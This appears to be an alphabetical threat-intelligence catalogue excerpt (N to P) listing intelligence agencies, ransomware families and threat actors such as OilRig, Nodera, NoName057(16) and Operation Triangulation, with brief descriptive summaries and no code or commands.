National Intelligence Agency (Thailand)

National Intelligence Agency (NIA)

National Intelligence and Security Agency (NISA)[6][7][8][9]

National Intelligence and Security Agency (NISA)[6][7][8][9]

National Intelligence and Security Agency

National Intelligence and Security Agency (NISA)

National Intelligence and Security Service (Ethiopia)

National Intelligence and Security Service (NISS)

National Intelligence and Security Service (Panama)

National Intelligence and Security Service - Servicio Nacional de Inteligencia y Seguridad (SENIS)[24]

National Intelligence and Security Service (Rwanda)

National Intelligence and Security Service (Rwanda)

National Intelligence Centre (México)

National Intelligence Centre (CNI)

National Intelligence Cooperating Center (NICC)

National Intelligence Cooperating Center (NICC)

National Intelligence Coordinating Agency

National Intelligence Coordinating Agency (NICA) – Pambansang Ahensiya sa Ugnayang Intelihensiya

National Intelligence Directorate (Colombia)

Dirección Nacional de Inteligencia (DNI)

National Intelligence Directorate (Pakistan)

National Intelligence Directorate (NID)

National Intelligence Organization (Papua New Guinea)

National Intelligence Organization (NIO)

National Intelligence Organization (Turkey)

National Intelligence Organization (MİT)

National Intelligence Service (Albania)

State Intelligence Service (SHISH) – Sherbimi Informativ Shteteror

National Intelligence Service (Bulgaria)

State Intelligence Agency (Държавна агенция „Разузнаване“ (DAR)) – overseas intelligence gathering service under the supervision of the Council of Ministers of Bulgaria

National Intelligence Service (Burundi)

Service national de renseignement (SNR)

National Intelligence Service (Greece)

National Intelligence Service (ΕΥΠ) – Εθνική Υπηρεσία Πληροφοριών

National Intelligence Service (Kenya)

National Intelligence Service (NIS)

National Intelligence Service (South Korea)

National Intelligence Service (NIS)

National Investigation Agency

National Investigation Agency[10]

National Investigation Department of Nepal

National Investigation Department (NID)

National Police Agency of the ROC (Taiwan)

National Police Agency (NPA)

National Police Intelligence Directorate

National Police Intelligence Directorate (DNIP) – Dirección Nacional de Inteligencia Policial

National Reconnaissance Office

National Reconnaissance Office (NRO)

National Security Affairs Cell

National Security Affairs Cell[3]

National Security Agency (Bahrain)

NSA – National Security Agency

National Security Agency (Liberia)

National Security Agency

National Security Agency (Montenegro)

National Security Agency (ANB)

National Security Agency

National Security Agency (NSA)

National Security Bureau (Republic of China)

National Security Bureau (NSB)

National Security Bureau (Slovakia)

National Security Bureau - Národný bezpečnostný úrad (NBÚ)

National Security Bureau (Yemen)

National Security Bureau (NSB)

National Security Intelligence

National Security Intelligence (NSI)

National Security Office (Eritrea)

National Security Office

National Security Service (Armenia)

National Security Service (NSS)

National Technical Research Organisation

National Technical Research Organisation (NTRO)[10]

National Telecommunication Monitoring Centre

National Telecommunication Monitoring Centre (NTMC)

Natohub

Natohub is a hacker who claimed to have stolen 42,000 documents from the UN’s International Civil Aviation Organization and is offering the data for sale on underground forums. The compromised documents allegedly contain personal records of ICAO staff and others associated with the agency. While ICAO is investigating the potential breach, Natohub has also made unverified claims about accessing personal data on thousands of UN delegates. The actor's track record of leaks is limited, raising questions about the credibility of their assertions.

Naval Intelligence Department (NID)

Naval Intelligence Department (NID)

Naval Intelligence (Pakistan)

Naval Intelligence (NI)

Navy Intelligence Department

Navy Intelligence Department (military intelligence)

Nazar

This actor was identified by Juan Andres Guerrero-Saade from the SIG37 cluster as published in the ShadowBrokers' 'Lost in Translation' leak. Earliest known sighting potentially dates back to as far as 2008 with a confirmed center of activity around 2010-2013. The actor name is derived from a PDB debug string fragment: 'khzer'. Victimology indicates targeting of Iran, assessed with low confidence based on VT file submission locations. Nazar employs a modular toolkit where a main dropper silently registers multiple DLLs as OLE controls in the Windows registry. Functionality includes keylogging, sound and screen grabbing, as well as traffic capture using the MicroOlap Packet Sniffer library.

NazCrypt

ransomware

NB65

Network Battalion 65 is a hacktivist group with ties to Anonymous, known for attacking Russian companies and performing hack-and-leak operations.

Nblock

Nblock is an active extortion or ransomware group tracked by RansomLook.

NCrypt Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The attacker spreads the malware using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

Nefilim

According to Vitali Kremez and Michael Gillespie, this ransomware shares much code with Nemty 2.5. A difference is the removal of the RaaS component, which was replaced by email communications for payments. Uses AES-128, with the key then protected by RSA-2048.

Negozl

ransomware

Neitrino

ransomware

NemeS1S Ransomware

Ransomware as a Service

Nemesis Ransomware

It is directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments, and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc. The ransom is 10 bitcoins.

Nemty

A new ransomware family dubbed “Nemty” for the extension it adds to encrypted files has recently surfaced in the wild. According to a report from Bleeping Computer, New York-based reverse engineer Vitali Kremez posits that Nemty is possibly delivered through exposed remote desktop connections.

Nemucod

Ransomware. The 7zip (a0.exe) variant cannot be decrypted; encrypts the first 2048 bytes.

Nemzetbiztonsági Hivatal

Alkotmányvédelmi Hivatal (AH) (Constitution Protection Office)

Nemzetbiztonsági Szakszolgálat (NBSZ) (Special Service for National Security)

Nemzetbiztonsági Szakszolgálat (NBSZ) (Special Service for National Security)

Nemzeti Információs Központ (NIK) (National Information Center)

Nemzeti Információs Központ (NIK) (National Information Center)

Netflix Ransomware

It is directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments, and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc. This ransomware uses the well-known online service as a decoy: it poses as a Netflix code generator for Netflix logins, but instead encrypts your files. The ransom is $100 in Bitcoin.

Netix

Ransomware

Netrunner

Netrunner is an active extortion or ransomware group tracked by RansomLook.

NetRunnerPR

NetRunnerPR has claimed to breach the networks of Shiraume Hospital and Nippon Medical School Musashi Kosugi Hospital in Japan, exfiltrating patient PII and medical records. The actor announced plans to release a complete database on March 5, 2026, and an additional 20,000 records on February 16, 2026, contingent on undisclosed conditions. The claims were made on a cybercrime forum, accompanied by sample data to validate the breaches. NetRunnerPR's account shows limited activity history and lacks a documented history of major ransomware operations or confirmed breaches, raising questions about the credibility of the claims.

Netwalker

Netwalker is an active extortion or ransomware group tracked by RansomLook.

Nevada

Nevada is an active extortion or ransomware group tracked by RansomLook.

New Zealand Security Intelligence Service

New Zealand Security Intelligence Service[20]

News Division

News Division

NewsPenguin

NewsPenguin is a threat actor that has been targeting organizations in Pakistan. They use a complex payload delivery mechanism and exploit the upcoming Pakistan International Maritime Expo & Conference as a lure to trick their victims. The group has been linked to a phishing campaign that leverages spear-phishing emails and weaponized documents to deliver an advanced espionage tool.

NewWave

ransomware

NextCry

ransomware

Nexus Zeta

Nexus Zeta is no stranger to implementing SOAP-related exploits. The threat actor has already been observed implementing two other known SOAP-related exploits, CVE-2014-8361 and CVE-2017-17215, in his Satori botnet project. A third SOAP exploit, the TR-069 bug, has also been observed previously in IoT botnets. This makes EDB 38722 the fourth SOAP-related exploit discovered in the wild in IoT botnets.

Nhtnwcuf Ransomware (Fake)

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The attacker spreads the malware using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

Nhtnwcuf

Ransomware. Does not encrypt the files; files are destroyed.

Nickel Alley

NICKEL ALLEY is a North Korean threat group that targets technology professionals through fake job opportunities, employing social engineering tactics such as creating fraudulent LinkedIn pages and GitHub repositories for malware delivery. They utilize the ClickFix tactic to deploy the PyLangGhost RAT, which supports file exfiltration and system profiling, particularly focusing on Chrome cryptocurrency wallet data. The group has also leveraged Visual Studio Code tasks to execute commands for malware retrieval based on the victim's operating system. Their operations indicate a dual focus on cryptocurrency theft and potential supply chain compromise or corporate espionage.

Night Dragon

Night Dragon is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.

Night Tsunami

Microsoft threat actor profile. Origin/Threat: Israel.

NightEagle

NightEagle is an advanced threat actor that targeted China's high-tech industry and military organisations, leveraging sophisticated techniques, 0-days, and specialized detection-evading malware. The threat actor appears to have access to significant funding, with dedicated infrastructure, and focuses on low-noise, low-impact intelligence-gathering operations. NightEagle is identified as a North American, state-sponsored or state-affiliated group that has been active since at least 2023.

Nightmare

ransomware

Nightsky

Nightsky is an active extortion or ransomware group tracked by RansomLook.

Nightspire

Nightspire is an active extortion or ransomware group tracked by RansomLook.

NinjaLoc

ransomware

Nitro

These attackers were the subject of an extensive report by Symantec in 2011, which termed the attackers Nitro and stated: 'The goal of the attackers appears to be to collect intellectual property such as design documents, formulas, and manufacturing processes. In addition, the same attackers appear to have a lengthy operation history including attacks on other industries and organizations. Attacks on the chemical industry are merely their latest attack wave. As part of our investigations, we were also able to identify and contact one of the attackers to try and gain insights into the motivations behind these attacks.' Palo Alto Networks reported on continued activity by the attackers in 2014.

Nitrogen

Nitrogen is an active extortion or ransomware group tracked by RansomLook.

NM4

ransomware

NMCRYPT Ransomware

The NMCRYPT Ransomware is a generic file encryption Trojan that was detected in the middle of April 2018. The NMCRYPT Ransomware is a file encoder Trojan that is designed to make data unreadable and convince users to pay a fee for unlocking content on the infected computers. The NMCRYPT Ransomware is nearly identical to hundreds of variants of the HiddenTear open-source ransomware and compromised users are unable to use the Shadow Volume snapshots made by Windows to recover. Unfortunately, the NMCRYPT Ransomware disables the native recovery features on Windows, and you need third-party applications to rebuild your data.

NMoreia 2.0 Ransomware

It is directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments, and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

NMoreira Ransomware

It is directed at English-speaking users and is therefore able to infect worldwide. It is spread using email spam, fake updates, attachments, and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files, etc.

NMoreira

Ransomware

Noblis

ransomware

NOCTURNAL SPIDER

Mentioned as MaaS operator in CrowdStrike's 2020 Report.

Nodera Ransomware

Nodera is a ransomware family that uses the Node.js framework and was discovered by Quick Heal researchers. The infection chain starts with a VBS script embedded with multiple JavaScript files. Upon execution, a directory is created and both the main node.exe program and several required Node.js files are downloaded into the directory. Additionally, a malicious JavaScript payload that performs the encryption process is saved in this directory. After checking that it has admin privileges and setting applicable variables, the malicious JavaScript file enumerates the drives to create a list of targets. Processes associated with common user file types are stopped and volume shadow copies are deleted. Finally, all user-specific files on the C: drive and all files on other drives are encrypted and appended with a .encrypted extension. The ransom note containing instructions on paying the Bitcoin ransom is provided along with a batch script to be used for decryption after obtaining the private key. Some mistakes in the ransom note identified by the researchers include the fact that it mentions a 2048-bit RSA public key instead of 4096-bit (the size that was actually used), a hard-coded private key destruction time dating back almost two years, and a lack of instructions for how the private key will be obtained after the ransom is paid. These are signs that the ransomware may be in the development phase and was likely written by an amateur. For more information, see the Quick Heal blog post in the Reference section below.

Noescape

Noescape is an active ransomware-as-a-service operation tracked by RansomLook.

Nog4yH4n

ransomware

Nokoyawa

Nokoyawa is an active extortion or ransomware group tracked by RansomLook.

NOMAD PANDA

In the first quarter of 2018, CrowdStrike Intelligence identified NOMAD PANDA activity targeting Central Asian nations with exploit documents built with the 8.t tool.

Nomikon

ransomware

NoName057(16)

NoName057(16) performs DDoS attacks on websites belonging to governments, news agencies, armies, suppliers, telecommunications companies, transportation authorities, financial institutions, and more, in Ukraine and in neighboring countries supporting Ukraine, such as Estonia, Lithuania, Norway, and Poland.

NoobCrypt

Ransomware

NotAHero

ransomware

NOTROBIN

Researchers at FireEye report finding a hacking group (dubbed NOTROBIN) that has been bundling mitigation code for NetScaler servers with its exploits. In effect, the hackers exploit the flaw to get access to the server, kill any existing malware, set up their own backdoor, then block off the vulnerable code from future exploit attempts by mitigation.

Nova RaaS

Nova appears to refer to a ransomware-as-a-service ("RaaS") infrastructure provider. Public threat reporting indicates that affiliates leveraging the Nova victim extortion site are known to use a Rust-based ransomware developed by the RALord ransomware operation, although an original ".nova" ransomware family has been identified as well.[[SonicWall Nova Ransomware April 11 2025](/references/4926be5f-0eea-44cc-a73e-2f173eee901b)][[Cyble April 17 2025](/references/cad46e02-2e68-4347-be1c-7be910adee95)]

nova

Rebrand of RALord

Nozelesn

ransomware

Nuke

Ransomware

Nullbulge

NullBulge is a cybercriminal threat group targeting AI and gaming focused entities. They weaponize code in publicly available repositories to distribute malware, including LockBit ransomware. The group claims to be motivated by a pro-art, anti-AI cause, but their activities indicate a financial focus. NullBulge uses obfuscated code in public repositories and malicious mods to target their victims.

Nullbyte

Ransomware

Nulltica

ransomware

nvrmre

AKA Lemon

Nx / OSR

ransomware

Nyton

ransomware

NyxarGroup

NyxarGroup is a threat actor involved in a coordinated data brokerage ecosystem across Latin America, primarily targeting government infrastructure. They have published high volumes of data, including 110,000 records from Chile's Servicio Civil platform and 250GB from the Ley del Lobby platform, which tracks lobbying activities. The data exfiltrated includes limited fields but provides a directory of Chilean government employees, enhancing the visibility of the public sector workforce. NyxarGroup's activities indicate a focus on exploiting government transparency and training systems for data leaks.

NZMR

ransomware

Obscura

Obscura is an active extortion or ransomware group tracked by RansomLook.

Obsidian Orb

Obsidian Orb is an active extortion or ransomware group tracked by RansomLook.

Oceans

Oceans is an active extortion or ransomware group tracked by RansomLook.

Ocelot Ransomware (FAKE RANSOMWARE)

It is directed at English-speaking users and is therefore able to infect worldwide. This is a fake ransomware: your files are not really encrypted, but the attacker still asks for a ransom of 0.03 bitcoins. It is still dangerous even though it is fake, since the attacker has still gained access to your computer.

OCT

ransomware

Octovillan

Octovillan is an active extortion or ransomware group tracked by RansomLook.

ODCODC

Ransomware

OpenToYou Ransomware (formerly known as OpenToDecrypt)

This ransomware's note is written in English, so it could be used worldwide. The ransomware is spread with the help of email spam, fake ads, fake updates, and infected install files.

Office for Foreign Relations and Information

Office for Foreign Relations and Information (Úřad pro zahraniční styky a informace, ÚZSI)

Office for Safeguarding National Security of the CPG in the HKSAR

Office for Safeguarding National Security of the CPG in the HKSAR (CPGNSO)

Office for Security and Counter-Terrorism

Office for Security and Counter-Terrorism (OSCT) – Counter terrorism and protecting critical national infrastructure.

Office of Intelligence and Counterintelligence

Office of Intelligence and Counterintelligence (OICI)

Office of National Intelligence (Australia)

Office of National Intelligence (ONI)

Office of Naval Intelligence

Office of Naval Intelligence (ONI)

Office of Terrorism and Financial Intelligence

Office of Terrorism and Financial Intelligence (TFI)

Office of the Chief of Military Security Affairs

Office of the Chief of Military Security Affairs (OCMSA)

Offline ransomware

Ransomware. Email addresses overlap with .777 addresses.

Offwhite

Offwhite is an active extortion or ransomware group tracked by RansomLook.

Oghab 2

Oghab 2 – Nuclear facilities security

Ogre

ransomware

OhNo-FakePDF

ransomware

OhNo!

ransomware

OilAlpha

OilAlpha has almost exclusively relied on infrastructure associated with the Public Telecommunication Corporation (PTC), a Yemeni government-owned enterprise reported to be under the direct control of the Houthi authorities. OilAlpha used encrypted chat messengers like WhatsApp to launch social engineering attacks against its targets. It has also used URL link shorteners. Per victimology assessment, it appears a majority of the targeted entities were Arabic-language speakers and operated Android devices.

OilRig

OilRig is an Iranian threat group operating primarily in the Middle East by targeting organizations in this region that are in a variety of different industries; however, this group has occasionally targeted organizations outside of the Middle East as well. It also appears OilRig carries out supply chain attacks, where the threat group leverages the trust relationship between organizations to attack their primary targets. OilRig is an active and organized threat group, which is evident based on their systematic targeting of specific organizations that appear to be carefully chosen for strategic purposes. Attacks attributed to this group primarily rely on social engineering to exploit the human rather than software vulnerabilities; however, on occasion this group has used recently patched vulnerabilities in the delivery phase of their attacks. The lack of software vulnerability exploitation does not necessarily suggest a lack of sophistication, as OilRig has shown maturity in other aspects of their operations. Such maturity involves organized evasion testing used during the development of their tools, the use of custom DNS tunneling protocols for command and control (C2) and data exfiltration, and custom web shells and backdoors used to persistently access servers. OilRig relies on stolen account credentials for lateral movement. After OilRig gains access to a system, they use credential dumping tools, such as Mimikatz, to steal credentials for accounts logged into the compromised system. The group uses these credentials to access and move laterally to other systems on the network. After obtaining credentials from a system, operators in this group prefer to use tools other than their backdoors to access the compromised systems, such as remote desktop and PuTTY. OilRig also uses phishing sites to harvest credentials from individuals at targeted organizations to gain access to internet-accessible resources, such as Outlook Web Access.
Since at least 2014, an Iranian threat group tracked by FireEye as APT34 has conducted reconnaissance aligned with the strategic interests of Iran. The group conducts operations primarily in the Middle East, targeting financial, government, energy, chemical, telecommunications and other industries. Repeated targeting of Middle Eastern financial, energy and government organizations leads FireEye to assess that those sectors are a primary concern of APT34. The use of infrastructure tied to Iranian operations, timing and alignment with the national interests of Iran also lead FireEye to assess that APT34 acts on behalf of the Iranian government.

OldGremlin

OldGremlin is a Russian-speaking ransomware group that has been active for several years. They primarily target organizations in Russia, including banks, logistics, industrial, insurance, retail, and IT companies. OldGremlin is known for using phishing emails as an initial infection vector and has developed custom malware for both Windows and Linux systems. They have conducted multiple malicious email campaigns and demand large ransoms from their victims, with some reaching millions of dollars.

Oled

ransomware

OMG! Ransomware

Ransomware. Infection: drive-by download; Platform: Windows; Extortion by prepaid voucher.

OmniSphere

ransomware

One

ransomware

Onepercent

Onepercent is an active extortion or ransomware group tracked by RansomLook.

ONI

ransomware

OnionDog

This threat actor targets the South Korean government, transportation, and energy sectors.

ONYX Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The attacker spreads the malware using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files, etc. Georgian ransomware.

OoPS Ramenware

ransomware

OopsLocker

ransomware

Opal Sleet

Konni is a threat actor associated with APT37, a North Korean cyber crime group. They have been active since 2012 and are known for their cyber-espionage activities. Konni has targeted various sectors, including education, government, business organizations, and the cryptocurrency industry. They have exploited vulnerabilities such as CVE-2023-38831 and have used malware like KonniRAT to gain control of victim hosts and steal important information.

OPdailyallowance

ransomware

OpenToYou

ransomware

Operation BugDrop

This threat actor targets critical infrastructure entities in the oil and gas sector, primarily in Ukraine. The threat actors deploy the BugDrop malware to remotely access the microphones in their targets' computers to eavesdrop on conversations.

Operation C-Major

Group targeting Indian Army or related assets in India, as well as activists and civil society in Pakistan. Attribution to a Pakistani connection has been made by TrendMicro and others.

Operation Cobalt Whisper

Operation Cobalt Whisper is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.

Operation Comando

Operation Comando is a pure cybercrime campaign, possibly of Brazilian origin, with a concrete and persistent focus on the hospitality sector, which shows how a threat actor can be successful in pursuing its objectives while maintaining a cheap budget. The use of DDNS services, publicly available remote access tools, and a minimal knowledge of software development (in this case VB.NET) has been enough for running a campaign lasting months, and potentially gathering credit card information and other data.

Operation DRBControl

Operation DRBControl is a cyberespionage campaign targeting gambling companies in Southeast Asia, first identified in 2019. The operation involves the use of HyperBro malware and SysUpdate variants, with evidence of customer database and source code exfiltration. The threat actor has employed domain spoofing for command and control and has shown a consistent interest in the gambling industry. Trend Micro's analysis linked multiple tools and malware families to this campaign, indicating a sophisticated and evolving threat landscape.

Operation Emmental

Operation Emmental, also known as the Retefe gang, is a threat actor group that has been active since at least 2012. They primarily target customers of banks in countries such as Austria, Sweden, Switzerland, and Japan. The group has developed sophisticated malware, including a Mac alternative called Dok, to bypass two-factor authentication and hijack network traffic. They have also been observed using phishing emails to spread their malware. The group is believed to be Russian-speaking and has continuously improved their malicious codes over the years.

Operation ForumTroll

Operation ForumTroll is a sophisticated cyber espionage campaign discovered by Kaspersky in mid-March 2025. The attack exploited a zero-day vulnerability in Google Chrome, identified as CVE-2025-2783, which allowed attackers to bypass the browser's security features. Victims were infected by clicking on personalized phishing links in emails, allegedly from the organizers of the "Primakov Readings" forum, targeting media outlets, educational institutions, and government organizations in Russia. The goal of the attack appears to be espionage, and the campaign is believed to be the work of a state-sponsored APT group. Google quickly released an update to fix the vulnerability after being notified by Kaspersky.

Operation Ghoul

Operation Ghoul is a profit-driven threat actor that targeted over 130 organizations in 30 countries, primarily in the industrial and engineering sectors. They employed high-quality social engineering techniques, such as spear-phishing emails disguised as payment advice from a UAE bank, to distribute malware. The group's main motivation is financial gain through the sale of stolen intellectual property and business intelligence, as well as attacks on banking accounts. Their attacks were effective, particularly against companies that were unprepared to detect them.

Operation Global III

Ransomware. Is a file infector (virus).

Operation Kabar Cobra

Operation Kabar Cobra is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.

Operation Parliament

This threat actor uses spear-phishing techniques to target parliaments, government ministries, academics, and media organizations, primarily in the Middle East, for the purpose of espionage. Based on our findings, we believe the attackers represent a previously unknown geopolitically motivated threat actor. The campaign started in 2017, with the attackers doing just enough to achieve their goals. They most likely have access to additional tools when needed and appear to have access to an elaborate database of contacts in sensitive organizations and personnel worldwide, especially of vulnerable and non-trained staff. The victim systems range from personal desktop or laptop systems to large servers with domain controller roles or similar. The nature of the targeted ministries varied, including those responsible for telecommunications, health, energy, justice, finance and so on. Operation Parliament appears to be another symptom of escalating tensions in the Middle East region. The attackers have taken great care to stay under the radar, imitating another attack group in the region. They have been particularly careful to verify victim devices before proceeding with the infection, safeguarding their command and control servers. The targeting seems to have slowed down since the beginning of 2018, probably winding down when the desired data or access was obtained. The targeting of specific victims is unlike previously seen behavior in regional campaigns by Gaza Cybergang or Desert Falcons and points to an elaborate information-gathering exercise that was carried out before the attacks (physical and/or digital). With deception and false flags increasingly being employed by threat actors, attribution is a hard and complicated task that requires solid evidence, especially in complex regions such as the Middle East.

Operation Poison Needles

What’s noteworthy is that according to the introduction on the compromised website of the polyclinic (http://www.p2f.ru), the institution was established in 1965 and it was founded by the Presidential Administration of Russia. The multidisciplinary outpatient institution mainly serves the civil servants of the highest executive, legislative, judicial authorities of the Russian Federation, as well as famous figures of science and art. Since it is the first detection of this APT attack by 360 Security on a global scale, we code-named it as “Operation Poison Needles”, considering that the target was a medical institution. Currently, the attribution of the attacker is still under investigation. However, the special background of the polyclinic and the sensitiveness of the group it served both indicate the attack is highly targeted. Simultaneously, the attack occurred at a very sensitive timing of the Kerch Strait Incident, so it also aroused the assumption on the political attribution of the attack.

Operation Red Signature

The threat actors compromised the update server of a remote support solutions provider to deliver a remote access tool called 9002 RAT to their targets of interest through the update process. They carried this out by first stealing the company’s certificate then using it to sign the malware. They also configured the update server to only deliver malicious files if the client is located in the range of IP addresses of their target organisations.

Operation Shadow Force

Operation Shadow Force is the name given to a cluster of activity, represented by the Shadow Force and Wgdrop malware from 2013 to 2020, that attacks Korean companies and organizations. The group's first confirmed attack was in March 2013, but judging by the malware creation dates it was likely active before 2012. Because the malware they mainly use is Shadow Force, the activity was named Operation Shadow Force; it has not been confirmed whether the attacker is associated with any known group.

Operation ShadowHammer

Newly discovered supply chain attack that leveraged ASUS Live Update software. The goal of the attack was to surgically target an unknown pool of users, which were identified by their network adapters’ MAC addresses. To achieve this, the attackers had hardcoded a list of MAC addresses in the trojanized samples and this list was used to identify the actual intended targets of this massive operation. We were able to extract more than 600 unique MAC addresses from over 200 samples used in this attack. Of course, there might be other samples out there with different MAC addresses in their list.

Operation Sharpshooter

The McAfee Advanced Threat Research team and McAfee Labs Malware Operations Group have discovered a new global campaign targeting nuclear, defense, energy, and financial companies, based on McAfee® Global Threat Intelligence. This campaign, Operation Sharpshooter, leverages an in-memory implant to download and retrieve a second-stage implant—which we call Rising Sun—for further exploitation. According to our analysis, the Rising Sun implant uses source code from the Lazarus Group’s 2015 backdoor Trojan Duuzer in a new framework to infiltrate these key industries. Operation Sharpshooter’s numerous technical links to the Lazarus Group seem too obvious to immediately draw the conclusion that they are responsible for the attacks, and instead indicate a potential for false flags. Our research focuses on how this actor operates, the global impact, and how to detect the attack. We shall leave attribution to the broader security community.

Operation Soft Cell

In 2018, the Cybereason Nocturnus team identified an advanced, persistent attack targeting global telecommunications providers carried out by a threat actor using tools and techniques commonly associated with Chinese-affiliated threat actors, such as APT10. This multi-wave attack focused on obtaining data of specific, high-value targets and resulted in a complete takeover of the network.

Operation Triangulation

Operation Triangulation is an ongoing APT campaign targeting iOS devices with zero-click iMessage exploits. The threat actor behind the campaign has been active since at least 2019 and continues to operate. The attack chain involves the delivery of a malicious iMessage attachment that launches a series of exploits, ultimately leading to the deployment of the TriangleDB implant. Kaspersky researchers have discovered and reported multiple vulnerabilities used in the campaign, with patches released by Apple.

Operation WizardOpium

We are calling these attacks Operation WizardOpium. So far, we have been unable to establish a definitive link with any known threat actors. There are certain very weak code similarities with Lazarus attacks, although these could very well be a false flag. The profile of the targeted website is more in line with earlier DarkHotel attacks that have recently deployed similar false flag attacks.

Operation Wocao

Operation Wocao (我操, “Wǒ cāo”, used as “shit” or “damn”) is the name that Fox-IT uses to describe the hacking activities of a Chinese based hacking group. This report details the profile of a publicly underreported threat actor that Fox-IT has dealt with over the past two years. Fox-IT assesses with high confidence that the actor is a Chinese group and that they are likely working to support the interests of the Chinese government and are tasked with obtaining information for espionage purposes. With medium confidence, Fox-IT assesses that the tools, techniques and procedures are those of the actor referred to as APT20 by industry partners. We have identified victims of this actor in more than 10 countries, in government entities, managed service providers and across a wide variety of industries, including Energy, Health Care and High-Tech.

Orca

Orca is an active extortion or ransomware group tracked by RansomLook.

Ordinal

ransomware

Ordinypt

ransomware

Organised Crime and Intelligence Unit

Organised Crime and Intelligence Unit

orion

Jan 13, 2026: We believe the group might be related to Babuk-Bjorka.

Osiris

Osiris is an active extortion or ransomware group tracked by RansomLook.

Osno

ransomware

Osyolorz Collective

Osyolorz Collective is an active extortion or ransomware group tracked by RansomLook.

OurMine

OurMine is known for hijacking celebrity internet accounts, often committing cyber vandalism to advertise its commercial services. (Trend Micro) In light of the recent report detailing its willingness to pay US$250,000 in exchange for the 1.5 terabytes’ worth of data swiped by hackers from its servers, HBO finds itself dealing with yet another security breach. Known for hijacking prominent social media accounts, the self-styled white hat hacking group OurMine took over a number of verified Twitter and Facebook accounts belonging to the cable network. These include accounts for HBO shows, such as “Game of Thrones,” “Girls,” and “Ballers.” This is not the first time that OurMine has claimed responsibility for hacking high-profile social networking accounts. Last year, the group victimized Marvel, The New York Times, and even the heads of some of the biggest technology companies in the world. Mark Zuckerberg, Jack Dorsey, Sundar Pichai, and Daniel Ek — the CEOs of Facebook, Twitter, Google and Spotify, respectively — have also fallen victim to the hackers, dispelling the notion that a career in software and technology exempts one from being compromised.

OUTLAW SPIDER

On May 7, 2019, Mayor Bernard “Jack” Young confirmed via Twitter that the network of the U.S. City of Baltimore (CoB) was infected with ransomware. This infection was later confirmed to have been conducted by OUTLAW SPIDER, the actor behind the RobbinHood ransomware. The actor demanded to be paid 3 BTC (approximately $17,600 USD at the time) per infected system, or 13 BTC (approximately $76,500 USD at the time) for all infected systems, to recover the city’s files.

OverFlame

OverFlame is a hacktivist group known for executing DDoS attacks and website defacements, primarily targeting government institutions and corporations in Europe and North America. The group has been involved in coordinated attacks alongside other pro-Russian threat actors, such as NoName057 and the People’s Cyber Army, often motivated by anti-government and anti-corporate sentiments. OverFlame operates through underground forums and encrypted messaging platforms to coordinate attacks and recruit members. Their activities have included targeting financial services, political parties, and educational institutions, demonstrating a focus on disrupting critical infrastructure.

OVERLORD SPIDER

OVERLORD SPIDER, aka The Dark Overlord. Similar to ransomware operators today, OVERLORD SPIDER likely purchased RDP access to compromised servers on underground forums in order to exfiltrate data from corporate networks. The actor was known to attempt to “sell back” the data to the respective victims, threatening to sell the data to interested parties should the victim refuse to pay. There was at least one identified instance of OVERLORD SPIDER successfully selling victim data on an underground market.

Owl

Ransomware

Ox Thief

Ox Thief is an active extortion or ransomware group tracked by RansomLook.

OzozaLocker Ransomware

It is directed at English-speaking users and is therefore able to infect victims worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all of the victim's files, including music, MS Office and Open Office documents, pictures, videos, shared online files, etc. https://3.bp.blogspot.com/--jubfYRaRmw/WDaOyZXkAaI/AAAAAAAACQE/E63a4FnaOfACZ07s1xUiv_haxy8cp5YCACLcB/s1600/ozoza2.png

Pacha Group

Antd is a miner found in the wild on September 18, 2018. Recently we discovered that the authors of Antd are actively delivering newer campaigns deploying a broad number of components, most of them completely undetected and operating within compromised third-party Linux servers. Furthermore, we have observed that some of the techniques implemented by this group are unconventional, and there is an element of sophistication to them. We believe the authors behind this malware are of Chinese origin. We have labeled the undetected Linux.Antd variants Linux.GreedyAntd and classified the threat actor as Pacha Group.

Packrat

A threat group that has been active for at least seven years has used malware, phishing and disinformation tactics to target activists, journalists, politicians and public figures in various Latin American countries. The threat actor, dubbed Packrat based on its preference for remote access Trojans (RATs) and because it has used the same infrastructure for several years, has been analyzed by Citizen Lab researchers John Scott-Railton, Morgan Marquis-Boire, and Claudio Guarnieri, and Cyphort researcher Marion Marschalek, best known for her extensive analysis of state-sponsored threats.

Pacman

ransomware

PadCrypt

Ransomware; has a live support chat.

Padlock Screenlocker

Ransomware. Unlock code is: ajVr/G\ RJz0R

Palace Office (Oman)

The Palace Office [Foreign Intelligence]

PALE PANDA

PALE PANDA is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.

Palestinian National Security Forces

Palestinian National Security Forces

Palestinian Preventive Security

Palestinian Preventive Security (internal security)

Pandora

Ransomware

Paradise Ransomware

MalwareHunterTeam discovered a new Paradise Ransomware variant that uses the extension _V.0.0.0.1{paradise@all-ransomware.info}.prt and drops a ransom note named PARADISE_README_paradise@all-ransomware.info.txt.

Paradise

Paradise is an active extortion or ransomware group tracked by RansomLook.

paradise2

paradise2 is an active extortion or ransomware group tracked by RansomLook.

Parasite

ransomware

PARINACOTA

